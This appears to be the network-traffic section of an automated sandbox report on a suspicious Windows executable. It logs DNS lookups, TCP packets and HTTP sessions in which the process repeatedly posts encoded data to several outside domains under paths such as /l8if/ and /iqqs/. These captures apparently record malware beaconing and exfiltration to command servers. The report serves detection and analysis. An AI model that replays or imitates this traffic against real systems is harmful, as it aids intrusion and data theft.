                                                                                                                    Oct 9, 2024 14:21:17.328536034 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:17.328547001 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:17.328558922 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:18.270903111 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:18.270992994 CEST8049650133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:18.271142006 CEST4965080192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:18.826195002 CEST4965080192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:19.846813917 CEST4965180192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:19.851872921 CEST8049651133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:19.855457067 CEST4965180192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:19.862317085 CEST4965180192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:19.867264032 CEST8049651133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:20.647305965 CEST8049651133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:20.647423029 CEST8049651133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:20.647743940 CEST4965180192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:20.651174068 CEST4965180192.168.2.4133.130.35.90
                                                                                                                    Oct 9, 2024 14:21:20.656012058 CEST8049651133.130.35.90192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:25.857425928 CEST4965280192.168.2.43.33.130.190
                                                                                                                    Oct 9, 2024 14:22:12.189147949 CEST8049672199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:12.189264059 CEST8049672199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:12.189282894 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:12.189368963 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:13.248573065 CEST4967280192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.269112110 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.274089098 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.274183035 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.289009094 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.293849945 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293901920 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293919086 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293932915 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293942928 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.293977022 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.294049025 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.294099092 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.294183969 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.726465940 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.726486921 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.726610899 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:14.726816893 CEST8049673199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:14.727458000 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:15.795530081 CEST4967380192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:16.814179897 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:16.819495916 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:16.825107098 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:16.832210064 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:16.837450027 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:17.289824009 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:17.289931059 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:17.290026903 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:17.290051937 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:17.290096998 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:17.294362068 CEST4967480192.168.2.4199.59.243.227
                                                                                                                    Oct 9, 2024 14:22:17.299520969 CEST8049674199.59.243.227192.168.2.4
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Oct 9, 2024 14:18:46.066627979 CEST53591741.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:07.386020899 CEST5373153192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:19:07.399467945 CEST53537311.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:23.658592939 CEST5742053192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:19:24.037482977 CEST53574201.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:38.593966007 CEST6521453192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:19:38.619972944 CEST53652141.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:19:51.969414949 CEST4983853192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:19:51.979980946 CEST53498381.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:00.053950071 CEST5728553192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:00.067641973 CEST53572851.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:14.157744884 CEST5263953192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:14.689730883 CEST53526391.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:28.860270023 CEST6350353192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:29.055114985 CEST53635031.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:42.642966986 CEST6237553192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:42.658792019 CEST53623751.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:20:56.740211010 CEST6325453192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:20:57.195081949 CEST53632541.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:10.908121109 CEST6122253192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:11.923410892 CEST6122253192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:12.203754902 CEST53612221.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:12.203768969 CEST53612221.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:25.658981085 CEST6442853192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:25.851200104 CEST53644281.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:39.986994028 CEST6418953192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:40.495313883 CEST53641891.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:21:53.814878941 CEST5108253192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:21:53.938647032 CEST53510821.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:09.103234053 CEST5819253192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:22:09.167215109 CEST53581921.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:22.299232006 CEST5099053192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:22:22.307487965 CEST53509901.1.1.1192.168.2.4
                                                                                                                    Oct 9, 2024 14:22:28.922280073 CEST6514453192.168.2.41.1.1.1
                                                                                                                    Oct 9, 2024 14:22:28.929727077 CEST53651441.1.1.1192.168.2.4
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.44935244.213.25.70803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:19:07.432673931 CEST467OUTGET /7mju/?rf-LZ=JlCtuN3HqPO8C&AHkx=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.newdaydawning.net
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:19:08.596672058 CEST481INHTTP/1.1 301 Moved Permanently
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:07 GMT
                                                                                                                    Server: Apache
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Redirect-By: WordPress
                                                                                                                    Location: http://newdaydawning.net/7mju/?rf-LZ=JlCtuN3HqPO8C&AHkx=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw=
                                                                                                                    Connection: close
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Content-Type: text/html; charset=UTF-8
Oct 9, 2024 14:19:08.615659952 CEST    5    IN    Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
1    192.168.2.4    49355    206.119.82.134    80    3732    C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp    Bytes transferred    Direction    Data
Oct 9, 2024 14:19:24.081482887 CEST    710    OUT    POST /l8if/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.40wxd.top
                                                                                                                    Origin: http://www.40wxd.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.40wxd.top/l8if/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm3ehr5w91FZukpE01eYrFyP1XVhCQdZ2P5g==
Oct 9, 2024 14:19:24.978863001 CEST    289    IN    HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:24 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
2    192.168.2.4    49367    206.119.82.134    80    3732    C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp    Bytes transferred    Direction    Data
Oct 9, 2024 14:19:26.632097960 CEST    730    OUT    POST /l8if/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.40wxd.top
                                                                                                                    Origin: http://www.40wxd.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.40wxd.top/l8if/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTim0inCcD7Vm3lILb/M6mm+1dqBVRPRtpB2Em5zGbXs7mmRQuhTMK1OwqDjoTaH0NQlZbw3AbiXHV4/GQomhvcNO3tXtvsIIRMNRieniiNaeybKU169ggdMixPMj6Q1tEI2PlilvPpKSgPRkImLkQaLGihZqv1brijZ1AdYAB2M01xo=
Oct 9, 2024 14:19:27.506109953 CEST    289    IN    HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:27 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
3    192.168.2.4    49377    206.119.82.134    80    3732    C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp    Bytes transferred    Direction    Data
Oct 9, 2024 14:19:29.175136089 CEST    10812    OUT    POST /l8if/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.40wxd.top
                                                                                                                    Origin: http://www.40wxd.top
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.40wxd.top/l8if/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:19:30.080307007 CEST    289    IN    HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
4    192.168.2.4    49390    206.119.82.134    80    3732    C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp    Bytes transferred    Direction    Data
Oct 9, 2024 14:19:31.716711044 CEST    459    OUT    GET /l8if/?AHkx=fb3YagVOau/9jH9JrwpuHsbxrllxr9uMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0IvhyZ1jg35IXHzinqtRNXlFD8GamKybSzcUs8=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.40wxd.top
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:19:32.618989944 CEST    289    IN    HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:32 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 146
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
5    192.168.2.4    49423    67.223.117.189    80    3732    C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp    Bytes transferred    Direction    Data
Oct 9, 2024 14:19:38.637706041 CEST    710    OUT    POST /iqqs/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.uburn.xyz
                                                                                                                    Origin: http://www.uburn.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.uburn.xyz/iqqs/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=S5nO3ybs7ms6Ta9sPOW/tswtntsKBz2i2dKJ/icATAPWOpWr0hht9fpoLMhShyedMzcYeaBwFdzM1PAfDQKPmxSyzZj3hgniCr+BA4TtaGpEg1OUkNhUEVCtohnZ+0PqMh01O9aKQ4wrDhMEmO8dDoDpYn3y9pU6v0PMoT0rcaAOwgpRSw7ckXz3tluujtYNNg==
Oct 9, 2024 14:19:39.233439922 CEST    1236    IN    HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:39 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 32106
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49437 | 67.223.117.189 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:19:41.188683987 CEST | 730 | OUT | POST /iqqs/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.uburn.xyz
                                                                                                                    Origin: http://www.uburn.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.uburn.xyz/iqqs/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=S5nO3ybs7ms6T6hsc9+/48wqpNsKPT2m2dGJ/nsQTybWONSrm19t8fpoAshT/CegMzY+efpwFZbM1PQfCn+MlBSw+5j1sAniCr+BA4W6aGhEnF+UmshXHVCqrhnZ0UPmMh0TO+fnQ7IrDhcEnf8eWYCiGn2htoNmiW3C214reL8v1m4LDBaL2XXEwinauulEWvryue6ePJfmS2s0E3LLrcI=
Oct 9, 2024 14:19:41.767956972 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:41 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 32106
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49454 | 67.223.117.189 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:19:43.738126993 CEST | 10812 | OUT | POST /iqqs/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.uburn.xyz
                                                                                                                    Origin: http://www.uburn.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.uburn.xyz/iqqs/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:19:44.427808046 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:44 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 32106
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49470 | 67.223.117.189 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:19:46.278547049 CEST | 459 | OUT | GET /iqqs/?rf-LZ=JlCtuN3HqPO8C&AHkx=f7Pu0FXPylRYdptkWs+23MtWxvoKJz6PgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb4laqx4Tc9G/2Lb24L4CzfFNZpkDBhe90DBs= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.uburn.xyz
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Oct 9, 2024 14:19:46.872437000 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Wed, 09 Oct 2024 12:19:46 GMT
                                                                                                                    Server: Apache
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    Content-Length: 32106
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49553 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:20:00.099026918 CEST | 713 | OUT | POST /eruc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.o731lh.vip
Origin: http://www.o731lh.vip
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
Referer: http://www.o731lh.vip/eruc/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=5rvH253M/d+aurAl6TW6OC4a+yRQCXuYf3IZqA2Q15JaeQIJbcVp+0AP+n+ZfbpWxVWu+vVRRiYlw723ctaxYno/To4PbAAxpBm1n2cO48xqFfxTk4P4zc2qWFcgdR6WDwybQ4YuUpQkAKdhdBya69R/lRKtz4hJqBwKF2LEACPAlT6NML/CSHMeM3/PUOh8fQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49563 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:20:02.645478964 CEST | 733 | OUT | POST /eruc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.o731lh.vip
Origin: http://www.o731lh.vip
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 221
Referer: http://www.o731lh.vip/eruc/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Ascii: AHkx=5rvH253M/d+avIIlple6FC4Z0SRQYnucf3UZqEmA1L9ad0AJadVptEAPq3/SCrpNxVqM+upRRiMlw6G3deiyZ3o9aI4NVgAxpBm1n2Zr48ZqFvhTlZP/982rRFcgLR6sDwzOQ8YEUvMkAIVhaVuZz9R9vxLlyZQtjgJkAXHQfCDUkVrXd6eVAHotRw27ZNc1Ebh1HR6taB99jUmd2xdiwPM=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49579 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:20:05.191098928 CEST | 10815 | OUT | POST /eruc/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.o731lh.vip
Origin: http://www.o731lh.vip
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10301
Referer: http://www.o731lh.vip/eruc/
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49593 | 3.33.130.190 | 80 | 3732 | C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:20:07.763654947 CEST | 460 | OUT | GET /eruc/?AHkx=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.o731lh.vip
Connection: close
